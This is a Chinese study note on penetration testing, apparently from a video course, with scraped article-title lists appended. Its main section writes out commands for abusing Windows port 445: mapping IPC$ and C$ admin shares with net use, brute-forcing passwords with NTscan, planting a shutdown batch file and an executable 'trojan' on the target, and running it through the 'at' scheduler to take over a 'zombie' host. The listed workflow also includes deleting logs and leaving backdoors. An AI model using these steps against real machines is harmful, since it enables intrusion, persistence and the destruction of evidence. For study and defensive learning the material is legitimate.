笔记

由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到)
还有有的软件下载谷歌浏览器权限不足(这个问题我也不知道是不是叫这个)
解决:谷歌里面安装迅雷插件,或者换个浏览器下载或者复制下载连接在迅雷里面下载;
太困了,明天再写吧!1!!!

1.授权

2.信息收集(nslookup whois)

3.扫描漏洞

​ namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描;

​ 高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0

​ 扫描网站漏洞(十大网站漏洞 )

4.漏洞利用

5.提权(shell环境命令控制权,桌面环境,最高权限)

=======删库跑路

6.毁尸灭迹(删除日志)

7.留后门

8.渗透测试报告(漏洞,端口)=》安全加固方案

手工测试端口号开放:

​ telnet IP地址 测试端口

映射共享文件夹,在本地电脑F盘

net use f: \10.1.1.2\share ROOT /user:administrator

net use f: \10.1.1.2\share /del

md 文件夹(创建文件夹)

w漏洞利用之IPC$:

net use f: \10.1.1.2\share 密码 /user:用户名

net use f: /del

net use * /del

net use f: \10.1.1.2\c$ 密码 /user:用户名

net use f: \10.1.1.2\ipc$ 密码 /user:用户名

暴力破解系统密码之445:

445漏洞利用之一IPC$:

1、scanport 扫描445端口

2、进行暴力破解:NTscan

net use f: \10.1.1.2\ipc$ 密码 /user:用户名

net use f: \10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del

net use f: \10.1.1.2\c$ 密码 /user:用户名

4、制作木马

copy con haha.bat

shutdown -s -t 100

^z

拷贝在f:盘

copy haha.bat f:

5、植入木马(留后门)

copy d:\heihei.exe \10.1.1.2\c$
6、设计计划任务自动执行木马:

net time \10.1,1.2
at \10.1.1.2 11:11 “c:\heihei.exe”
7、等待肉鸡上线

参考文献:
千锋教育(https://www.bilibili.com/video/BV1i7411G7vm)

渗透测试(445端口)相关推荐

  1. 通过Metasploitable2了解渗透测试基本思路

    0×00 前言/什么是Metasploitable2: Metasploitable是一个刻意制造的Linux靶机.此系统可应用于渗透测试,测试安全工具以及实践常见的渗透测试技术.Metasploit ...

  2. 3.100个渗透测试实战#3(Lampiao)

    目录 一.实验环境 二.实验流程 三.实验步骤 (一)信息收集--主机发现 1.查看kali的网卡和IP信息:(网卡名:eht0:IP:192.168.97.129) 2.查看靶机页面: 3.探测特定 ...

  3. 渗透测试入门15之常见端口安全测试

    在渗透测试中,端口扫描是一个非常重要的环节,端口扫描的目的是了解服务器上运行的服务信息,针对不同的端口进行不同的安全测试,本文的主要内容是关于常见端口安全隐患以及测试方法. DNS(53)UDP DN ...

  4. 渗透测试入门8之端口渗透

    渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...

  5. 《Nmap渗透测试指南》—第6章6.6节源端口欺骗

    本节书摘来自异步社区<Nmap渗透测试指南>一书中的第6章6.6节源端口欺骗,作者 商广明,更多章节内容可以访问云栖社区"异步社区"公众号查看. 6.6 源端口欺骗 表 ...

  6. 渗透测试中常用端口及利用

    渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...

  7. 渗透测试常见的默认端口

    ** 在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口,欢迎补充. ** ## 1.web常用端口 第三方通用组件漏洞: struts thinkphp jboss gan ...

  8. 渗透测试信息收集之域名信息、子域名信息、IP信息、端口信息

    域名信息收集 什么是信息收集 信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行 比如目标站点IP.中间件.脚本语言.端口.邮箱等等.信息收集包含资产收集但不限于资产收集 信 ...

  9. nmap扫描ipv6端口_web渗透测试系列 之 扫描(3)

    Nmap-扫描器之王 今天我们来聊聊被称之为扫描器之王的nmap,一般我们在渗透的时候都会这样说,第一步nmap开路.Nmap是一款网络扫描和主机检测的工具.开源免费的.可用于:主机发现.端口发现或枚 ...

  10. Kali渗透测试-远程控制:6200端口变成“后门”

    Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...

最新文章

  1. android theme material,Android Studio 换主题(Material Theme..)
  2. 打造一个宇宙 星系模拟产生对宇宙进化惊人见解
  3. 利用Glibc库-ORIGIN-提权
  4. 天天动听 半透明Menu效果
  5. 苹果笔记本能玩英雄联盟吗_《英雄联盟手游》日服安卓和ios数据互通说明 安卓和ios可以一起玩吗_英雄联盟手游...
  6. Nginx编译-安装-配置-优化实践总结
  7. 4006.Cacti集监控IBM刀片服务器温度和风扇运行状态
  8. 手写字体怎么转换?如何快速转换字体?
  9. 基于链表的学生信息管理系统和基于MySQL的学生信息管理系统 -C语言
  10. 姑娘,你需要台灯吗?
  11. 越喜欢村上春树,就越懂得生活
  12. Xutils上传图片(2)
  13. danlock锁_微信指纹密码锁下载最新版-微信指纹密码(Applock指纹)锁手机版app下载v2.51-单游网...
  14. Mac升级pip3 | pip install --upgrade pip
  15. 【Java基础】包、类、接口、常量、方法、变量的命名规则
  16. ,什么叫他妈的惊喜?
  17. 问卷调查工具专业排行榜
  18. 【抖音运营完整篇一】硬性条件过关,抖音视频播放量才会爆
  19. java angular2集成_Angular2整合其他插件的方法
  20. 深入浅出 Vue 中的 key 值

热门文章

  1. arccatalog点要素显示不完_改变人际关系核心要素,不讨好不献媚,牢记这3点,受益一生...
  2. 软件设计师中级下午题
  3. 用python分析股票收益影响因素的方法_Python3对股票的收益和风险进行分析
  4. wav转换mp3简单图文教程
  5. Flir Blackfly S USB3 工业相机:白平衡设置方法
  6. 8类必须学会的运营工具
  7. MATLAB图像处理(一)——计算机图形学之图像形状识别
  8. 免费文字识别软件有哪些?分享三款不错的软件
  9. stm32连接热敏打印机
  10. android5.0 输入法提取,搜狗手机输入法5.0 Android新版使用体验